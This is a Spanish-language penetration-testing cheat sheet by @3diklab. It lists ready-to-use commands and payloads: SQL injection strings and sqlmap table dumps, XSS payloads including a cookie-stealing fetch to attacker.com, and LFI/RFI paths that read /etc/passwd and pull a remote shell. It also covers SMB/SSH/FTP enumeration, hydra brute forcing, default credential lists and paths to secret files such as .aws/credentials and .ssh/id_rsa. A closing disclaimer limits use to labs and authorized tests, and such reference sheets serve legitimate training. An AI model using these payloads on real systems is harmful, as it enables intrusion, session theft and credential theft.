Por: @3diklab Última actualización: Noviembre 2025 Nivel: Intermediate
# Buscar exploits por keyword
searchsploit apache 2.4
# Buscar por versión específica
searchsploit -t "openssh 7.4"
# Mostrar ruta completa del exploit
searchsploit -p 12345
# Copiar exploit al directorio actual
searchsploit -m 12345Pro tip: Usa -t (title search) para resultados más precisos.
# Google dorking para CVEs
site:cve.mitre.org "Apache 2.4.49"
# Buscar en GitHub
site:github.com "exploit apache 2.4.49"# Manual testing (basic payloads)
' OR '1'='1
' OR 1=1--
admin'--
' UNION SELECT NULL--
# SQLMap (automated)
sqlmap -u "http://target.com/page?id=1" --dbs
sqlmap -u "http://target.com/page?id=1" -D database --tables
sqlmap -u "http://target.com/page?id=1" -D database -T users --dump
# SQLMap con POST data
sqlmap -u "http://target.com/login" --data="user=admin&pass=admin"
# SQLMap con cookie
sqlmap -u "http://target.com/panel" --cookie="PHPSESSID=abc123"# Basic payloads
<script>alert('XSS')</script>
<img src=x onerror=alert('XSS')>
<svg onload=alert('XSS')>
# Bypass filters
<scr<script>ipt>alert('XSS')</scr</script>ipt>
<SCRIPT>alert('XSS')</SCRIPT>
# Cookie stealing payload
<script>fetch('http://attacker.com/?c='+document.cookie)</script># LFI basic
/page?file=../../../../etc/passwd
/page?file=....//....//....//etc/passwd
/page?file=php://filter/convert.base64-encode/resource=index.php
# RFI
/page?file=http://attacker.com/shell.txt
/page?file=\\attacker.com\share\shell.txt
# Null byte bypass (PHP < 5.3)
/page?file=../../../../etc/passwd%00# Cambiar IDs en URLs
/user/profile?id=1 → id=2, id=3, id=1000
/download?file=doc1.pdf → doc2.pdf, admin.pdf
# Cambiar IDs en POST requests (usar Burp Suite)
POST /api/user/update
{"user_id": 100} → {"user_id": 1} # Intentar ID de admin# Detectar EternalBlue (MS17-010)
nmap -p 445 --script smb-vuln-ms17-010 <target>
# Detectar todas las vulns SMB conocidas
nmap -p 445 --script smb-vuln* <target>
# Enum4linux (enumeración completa)
enum4linux -a <target>
# SMBClient (anonymous access)
smbclient -L //<target>/ -N
smbclient //<target>/share -N# Banner grabbing
nc <target> 22
# Detectar claves débiles
nmap -p 22 --script ssh-hostkey <target>
# Bruteforce (usar con precaución)
hydra -l root -P /usr/share/wordlists/rockyou.txt ssh://<target># Nikto (scanner automático)
nikto -h http://target.com
# Detección de métodos HTTP peligrosos
nmap -p 80 --script http-methods <target>
# Shellshock (CVE-2014-6271)
nmap -p 80 --script http-shellshock --script-args uri=/cgi-bin/test.sh <target>
# Heartbleed (OpenSSL)
nmap -p 443 --script ssl-heartbleed <target># Anonymous login
ftp <target>
# User: anonymous
# Pass: anonymous
# Bruteforce
hydra -l admin -P passwords.txt ftp://<target># Servicios comunes con credenciales por defecto:
# - Tomcat: admin:admin, tomcat:tomcat
# - MySQL: root:(blank), root:root
# - PostgreSQL: postgres:postgres
# - MSSQL: sa:sa, sa:(blank)
# - RDP: administrator:administrator
# Bruteforce genérico con Hydra
hydra -L users.txt -P passwords.txt <service>://<target># Archivos de configuración comunes
/.env
/config.php
/wp-config.php
/web.config
/.git/config
/.aws/credentials
/.ssh/id_rsa
# Fuzzing con ffuf
ffuf -u http://target.com/FUZZ -w /usr/share/wordlists/dirb/common.txt \
-fc 404 -mc 200# Directorio sin autenticación
gobuster dir -u http://target.com -w /usr/share/wordlists/dirb/common.txt
# Archivos sensibles
/admin
/backup
/uploads
/.git
/.svn
/phpmyadmin# Scan general de vulnerabilidades
nmap --script vuln --script-args=unsafe=1 -p<ports> <target>
# Scripts específicos por categoría
nmap --script "auth or broadcast or discovery" <target># Directorios/archivos
/usr/share/wordlists/dirb/common.txt
/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
# Passwords
/usr/share/wordlists/rockyou.txt
/usr/share/wordlists/fasttrack.txt
# Subdominios
/usr/share/wordlists/amass/subdomains-top1mil.txt- CVE Mitre: https://cve.mitre.org/
- Exploit-DB: https://www.exploit-db.com/
- NVD: https://nvd.nist.gov/
- VulnDB: https://vuldb.com/
- Metasploit:
msfconsole→ búsqueda y explotación automatizada - Burp Suite: Proxy HTTP para testing manual avanzado
- OWASP ZAP: Alternativa gratuita a Burp Suite
IMPORTANTE: Estos comandos deben usarse EXCLUSIVAMENTE en:
- ✅ Máquinas propias
- ✅ Entornos de laboratorio (HTB, THM, etc.)
- ✅ Pentesting autorizado por escrito
El uso no autorizado es ILEGAL y puede resultar en cargos criminales.
¿Dudas? Comenta en TikTok: @3diklab
Sígueme para más contenido:
- 🎥 TikTok: @3diklab
- 🐦 X: @3diklab